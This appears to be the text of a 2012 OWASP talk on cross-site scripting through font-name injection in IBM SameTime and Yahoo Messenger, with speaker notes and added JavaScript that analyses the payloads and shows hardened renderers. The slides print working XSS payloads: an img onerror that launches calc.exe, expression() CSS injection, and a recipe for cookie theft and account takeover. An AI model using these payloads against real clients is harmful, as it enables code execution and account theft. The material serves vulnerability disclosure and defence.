Stylish XSS
via Font Name Injection

Presented by Adi Cohen at OWASP Israel 2012


Stylish XSS

  1. Stylish XSS via Font Name Injection. © 2012 IBM Corporation, IBM Security Systems
  2. Background - Instant Messengers
  3. Background - Instant Messengers
      <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
  4. Background - Instant Messengers. Every time I've seen this screen, I wondered "What if I could use some HTML here…"
  5. Background - Windows Fonts. Windows accepts basically any character as part of the font name; font name length is limited to ~30 chars.
  6. IBM Lotus SameTime Messenger
      <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
  7. SameTime - Exploit - CSS. Font Name: expression(alert(1));
  8. SameTime - Exploit - CSS. Font Name: expression(alert(1));
      Desired output: <span style=";font-family:expression(alert(1));…">
      Actual output: <span style="">
  9. SameTime - Exploit - New Attribute. Font Name: "onclick="alert(1)"
      Desired output: <span style="font-size:9pt;font-family:" onclick="alert(1)" ...">
      Actual output: <span style="font-size:9pt;font-family:" onclick="">
  10. SameTime - Exploit. ~50 fonts later
  11. SameTime - Exploit - Found
      Message sent: <span style="…font-family:
      Message received: <span style="…font-family:
  12. SameTime - Exploit - Found
      Message sent: <span style="…font-family:e0" <<style<style</style>img x='>
      Message received: <span style="…font-family:
  13. SameTime - Exploit - Found
      Message sent: <span style="…font-family:e0" <<style<style</style>img x='>
      Message received: <span style="…font-family:e0"> <img x='>
  14. SameTime - Exploit - Found
      Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">
      Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">
  15. SameTime - Exploit - Found
      Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe" '
      Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">
  16. SameTime - Exploit - Found
      Message sent: <span style="…font-family:e0" <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe" ' </span>
      Message received: <span style="…font-family:e0"> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:\windows\system32\calc.exe" ' </span>
  17. SameTime – Remote Code Execution
      <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:\windows\system32\calc.exe"'</span>
  18. Yahoo Messenger
  19. Yahoo Messenger – Message View. Lots of colors, but that's about it…
  20. Yahoo Messenger - History View
  21. Yahoo Messenger - History View
  22. Yahoo Messenger - History View. Finally, Yahoo's purple alert!
  23. Yahoo Messenger - The Payload
      <img src="x"onmouseover="alert(1)">
  24. Yahoo Messenger - Digging Deeper. Wait, what? It's not local?!
  25. Yahoo Messenger - Digging Deeper. Accessing this URL in Chrome yields the same result.
  26. Yahoo Messenger - Digging Deeper. That means I can read the cookie! And steal your account!
  27. Yahoo Messenger - Recap
      1. Send the victim a message that contains a malicious HTML snippet
      2. Wait 3-4 hours for it to show up in the history
      3. Convince the user to access his history, or send him a direct link to it (after all, it's not local)
      4. Have the victim click the Instant Message from the drop-down box
  28. Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  29. Yahoo Messenger - Web Messenger. During the tests, I noticed that a <Font> tag sent as part of the message text is rendered differently in the Web Messenger.
      • The message: <font face="xxx" size="20">33333</font>
      • Was rendered as: <font style="font-size:20pt" face="xxx" id="yui_3_2_0_20_1330267588862427">33333</font>
  30. Yahoo Messenger - Exploiting CSS. Add a new rule with an expression() call.
  31. Yahoo Messenger - Exploiting CSS
      Started with: <font face=ssss size="1&color:red">xxxx</font>
      To my surprise, the response came back as I hoped: <font style="font-size:1&amp;color:red" >xxxx</font>
  32. Yahoo Messenger - Exploiting CSS
      Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font>
      And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  33. Yahoo Messenger - Exploiting CSS. Time to open Internet Explorer!
  34. Yahoo Web Messenger - IE Version
  35. Yahoo Web Messenger - IE Version. The rules (for IE):
      1. The size attribute must be surrounded by double quotes (" ")
      2. The size value must be followed by the "pt;" suffix
      <font size="15pt;"> -> <font style="font-size=15pt;">
  36. Yahoo Web Messenger - IE Version. By tweaking the size value, a new font-family CSS rule could be injected.
      <font size="15pt;font-family:aaaa;"> -> <font style="font-size=15pt;font-family: aaaa;">
  37. Yahoo Web Messenger - IE Version. With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering:
      <font size="15pt;font-family:expression(alert(1));">
  38. Yahoo Web Messenger - IE Version. It should work correctly according to the rendered source in IE Developer Tools.
  39. Yahoo Web Messenger - IE Version. Yet somehow, no alert.
  40. Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself, I finally found out what I was afraid of. Or in other words, the "No Expression For You" meta tag:
      <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  41. Yahoo Web Messenger - Going Old School. Fired up my Windows XP VM and kicked out IE8.
  42. Yahoo Web Messenger - Finally
  43. Yahoo Messenger - History Window
  44. Questions?
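
The SameTime breakout on slides 11-17, as an added example that is not part of the talk and not IBM SameTime code. The first half takes the received message from slide 17 as given and runs a small attribute-aware start-tag tokenizer over it, which shows the structure a browser sees: the template's remaining CSS has become the value of the img's x attribute, and the src and onerror attributes come from the message-text field. The second half is a renderer that treats the two fields as data for their contexts: the font name is checked against an assumed policy (the ~30-character Windows limit from slide 5 plus a conservative character set) and emitted as a quoted CSS string, and every interpolated value is HTML-encoded for the attribute or body it lands in. The template constants, the policy and the function names are assumptions made here, not the product's.

```javascript
// Added example for slides 11-17 (not code from the talk or from IBM SameTime).
// Template constants, font-name policy and function names are assumptions.

// Template from slide 6: the font name lands inside a CSS value inside a
// style attribute; the message text lands in the element body.
const HEAD = '<span style="font-size:14pt;font-family:';
const MID = ';font-weight:normal;font-style:normal;">';
const TAIL = '</span>';
const DEFAULT_FONT = 'Segoe UI';

// Constructed from slide 17: what the receiving client rendered after the
// server stripped the <style<style</style> fragment from the font field.
const RECEIVED_SLIDE_17 =
  '<span style="font-size:14pt;font-family:e0"> ' +
  '<img x=\';font-weight:normal;font-style:normal;">\' src=\'x\' ' +
  'onerror=\'location="c:\\windows\\system32\\calc.exe"\'</span>';

// Minimal start-tag tokenizer. Attribute values may be quoted, so a ">" inside
// quotes does not end the tag; that is how the rest of the template CSS ends
// up inside the img's x attribute instead of closing it.
function extractElements(html) {
  const out = [];
  let i = 0;
  while ((i = html.indexOf('<', i)) >= 0) {
    const open = /^<\/?([a-zA-Z][\w-]*)/.exec(html.slice(i));
    if (!open) { i += 1; continue; }
    const el = { tag: open[1].toLowerCase(), attrs: {} };
    i += open[0].length;
    while (i < html.length && html[i] !== '>') {
      const a = /^[\s\/]*([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?/
        .exec(html.slice(i));
      if (!a) { i += 1; continue; }
      el.attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
      i += a[0].length;
    }
    out.push(el);
    i += 1;
  }
  return out;
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Assumed policy: letters, digits, space, hyphen, underscore, at most 30 chars
// (the Windows limit from slide 5). The name is emitted as a quoted CSS string
// (backslash and quote escaped, defence in depth given the policy) and then,
// like every other interpolated value, HTML-encoded for the context it sits in.
const FONT_NAME = /^[A-Za-z0-9 _-]{1,30}$/;
function cssFontFamily(name) {
  const safe = FONT_NAME.test(name) ? name : DEFAULT_FONT;
  return '"' + safe.replace(/[\\"]/g, '\\$&') + '"';
}
function renderHardened(fontName, messageText) {
  return HEAD + escapeHtml(cssFontFamily(fontName)) + MID + escapeHtml(messageText) + TAIL;
}

// The two attacker-controlled fields from slides 12-16.
const EVIL_FONT = 'e0" <<style<style</style>img x=\'';
const EVIL_TEXT = '\' src=\'x\' onerror=\'location="c:\\windows\\system32\\calc.exe"\'';

console.log(extractElements(RECEIVED_SLIDE_17));   // span, then an img carrying onerror
console.log(renderHardened(EVIL_FONT, EVIL_TEXT)); // one span, payload is inert text
```

Run with node: the first line prints two elements (a span and an img with x, src and onerror) for the slide-17 message; the second prints a single span whose body holds the message text as text. Deleting known-bad fragments from the font field, as the filter on slides 12-13 did, cannot hold while the field is still concatenated raw into an attribute; the fix is to encode for the output context and to reject font names that do not look like font names.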

Editor's Notes

  • Who am I?

    This presentation is going to show an idea I had and how I leveraged it into 3 vulnerabilities in the major IM clients.
    One of them will not be disclosed today because it has not yet been patched.

    It will be published on our blog once it is patched.
  • Explain how IMs work:

    Talk about:
    --------------
    The message window is actually a browser.
    The user's text message is wrapped in an HTML\XML template containing the following fields.
    The message is sent and then rendered as HTML\XML in the client's browser.


    Accepts parameters dictating:
    color
    font name
    font weight
    font style
    and more


    Let's talk about IMs,
    set aside for a moment all the functionality of video, sound, file transfer and so on,
    and keep only the aspect of sending messages.
    If we try to map the ways we have to send input to the system, we arrive at something like the example.



  • To configure all these settings, these apps usually come with a screen like this one.


    Every time I've seen this screen, I wondered "what if I could use some HTML here…"

  • And apparently, you can!


    Windows fonts:

    All characters are valid.
    Max 30 characters in every font name.

  • Explain that the font we change goes into this template and is then sent out.

    Talk about possible exploits:
    1. expression()
    2. Get out of the style attribute into the span tag
    3. Get out into the main HTML context
  • Starting off with expression()
  • The server actually filtered everything in the CSS.
  • Moving on to the next payload:
    getting out of the style attribute and into a new onclick attribute.

    Results in the onclick being empty. No good.
  • Two-field attack


    First field (Font Name):
    -----------
    1. The filter deletes the <style<style</style> part.
    2. We are left with e0"><img x='…
    This opens a new IMG tag with an x attribute (using a single quote).

    Second field (Message Text):
    ---------------
    1. Closes the x attribute (which now contains all the rest of the real CSS).
    2. Adds a src attribute.
    3. Adds an onerror attribute relocating the window to an EXE/BAT file.
    4. The file will be executed.



  • The second line shows the trapped CSS in the x attribute.
    Calc executed example.
  • Yahoo

    No history found in the local FS, meaning the template is unknown.

    Messages sent take about 3-4 hours until they register in the history.
    That means that every time I wanted to test anything, I had to wait 3-4 hours for the results and only then tweak my payloads and resend everything…

  • The message view seems to sanitize input well;
    all messages sent managed to do nothing more than pretty colors.

    Taking into account the fact that every test takes 3 hours, I decided it's best to move on and open the history.
  • Looks a bit better but still, nothing interesting…
  • The next step I took was to change the history filter to "Instant Messages".
  • Boom
    Endless pop-ups popped up…
    Apparently a lot of my tests worked…
  • I isolated the simplest payload that worked, and we can now move on and get some info such as:
    user agent
    privileges
    etc…
  • Digging deeper got us the browser type (IE)
    and the location of the page, which is an internet address.
  • So I tried accessing this page using Chrome, and as long as I was logged in to Yahoo! it got me the same results!
  • The next thing I found was the cookie.

    Apparently, Yahoo doesn't like to use HttpOnly cookies, so stealing the cookie actually means stealing the account!
  • Send message
    Wait 3-4h
    Social-engineer the user into opening the history
    Have the user click on the Instant Messages context menu
  • No more 3-hour tests

    I can now send a message and see it on the Web Messenger immediately.
    I now know the template.
  • I sent the first line of code;
    the Web Messenger rendered the second line of code.

    Changes:
    Added a new id attribute – we don't care!
    Transformed the size attribute into a CSS font-size declaration – very interesting!




  • First, I tried to inject a new color:red declaration,
    using the & -> &amp; encoding in order to terminate the CSS rule and inject a new one.

    And that worked without a glitch.


  • Tried the same with an expression() call, and all seems well.

  • Opening IE
    But no alert…


    After digging a little deeper
  • Different sanitizer per browser

    Found an older message that has a similar behavior.

    Worked on that example till I found some guidelines for the transformation on IE.

  • Talk about the two rules of transformation
  • Using these guidelines I attempted a new rule injection
  • Payload found – new rule injected
    Explain the CSS encoding trick
  • Everything looks good in IE
  • Somehow, no alert
  • Goddamn meta tag

    But this meta tag doesn’t work in IE<8
  • VM
    Kick out IE8
  • Entered the same URL with IE 7 and the alert shows up
  • Also in the original History view of the messenger which actually uses the installed IE
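
The Web Messenger rewrite on slides 29-37, as an added example that is not code from the talk or from Yahoo!. It models the rewrite observed there (a size attribute becomes a font-size declaration inside a style attribute), shows that entity-encoding the attribute value is the wrong layer of protection because the CSS parser sees the decoded value, and contrasts a rewrite that only lets the size select one of a fixed table of values. The regexes, the 1..7 size table, the font-name check and the function names are assumptions made here; the &-terminated variant on slides 31-32 depends on IE's lenient CSS parsing and is not modelled. The caveat from slide 40 applies to any test of this: expression() only runs in IE's quirks and IE7 document modes, and an X-UA-Compatible IE=8 header or meta tag switches the page to IE8 standards mode, where it is ignored.

```javascript
// Added example for slides 29-37 (not code from the talk or from Yahoo!).
// Regexes, the size table, the font-name policy and names are assumptions.

function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
  return s.replace(/[&<>"]/g, c => map[c]);
}
function decodeAttr(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_m, e) => map[e]);
}

// <font ...before... size="value" ...after...>; groups: before, quoted, bare, after
const FONT_TAG = /<font\b([^>]*?)\ssize=(?:"([^"]*)"|([^\s>]+))([^>]*)>/gi;

// Observed behaviour: a plain number gets "pt" appended (slide 29); anything
// else is copied into the declaration as-is, entity-encoded for the attribute
// (slides 31-37). Other attributes are passed through unchanged.
function rewriteFontTagVulnerable(html) {
  return html.replace(FONT_TAG, (_m, before, quoted, bare, after) => {
    const size = quoted !== undefined ? quoted : bare;
    const value = /^\d+$/.test(size) ? size + 'pt' : size;
    return '<font style="font-size:' + escapeAttr(value) + '"' + before + after + '>';
  });
}

// What the CSS parser sees: the attribute is entity-decoded by the HTML
// parser first, then split into ";"-separated property:value pairs. The
// attacker's "pt;" suffix ends font-size and opens a new declaration.
function styleDeclarations(html) {
  const m = /\sstyle="([^"]*)"/i.exec(html);
  if (!m) return [];
  return decodeAttr(m[1]).split(';').map(d => d.trim()).filter(Boolean).map(d => {
    const k = d.indexOf(':');
    return [d.slice(0, k).trim().toLowerCase(), d.slice(k + 1).trim()];
  });
}
function hasExpression(html) {
  return styleDeclarations(html).some(([, v]) => /expression\s*\(/i.test(v));
}

// Hardened rewrite: the size may only select one of the HTML font sizes 1..7,
// mapped to a fixed pt value; face is kept only if it looks like a font name
// (assumed policy). The tag is rebuilt, so no other attribute survives.
const SIZE_PT = { 1: 8, 2: 10, 3: 12, 4: 14, 5: 18, 6: 24, 7: 36 };
const FONT_NAME = /^[A-Za-z0-9 _-]{1,30}$/;
function rewriteFontTagHardened(html) {
  return html.replace(FONT_TAG, (_m, before, quoted, bare, after) => {
    const size = (quoted !== undefined ? quoted : bare).trim();
    const pt = SIZE_PT[/^[1-7]$/.test(size) ? size : '3'];
    const face = /\bface=(?:"([^"]*)"|([^\s>]+))/i.exec(before + after);
    const name = face && (face[1] ?? face[2]);
    let tag = '<font style="font-size:' + pt + 'pt"';
    if (name && FONT_NAME.test(name)) tag += ' face="' + escapeAttr(name) + '"';
    return tag + '>';
  });
}

const PAYLOAD = '<font size="15pt;font-family:expression(alert(1));">xxxx</font>'; // slide 37
console.log(rewriteFontTagVulnerable(PAYLOAD), hasExpression(rewriteFontTagVulnerable(PAYLOAD)));
console.log(rewriteFontTagHardened(PAYLOAD), hasExpression(rewriteFontTagHardened(PAYLOAD)));
```

The vulnerable rewrite reproduces slides 29, 31 and 37 character for character (minus the generated id), and styleDeclarations shows the injected font-family declaration the browser would evaluate. The hardened version never lets attacker text reach the CSS at all: the size is an index into a table, so there is no string to encode.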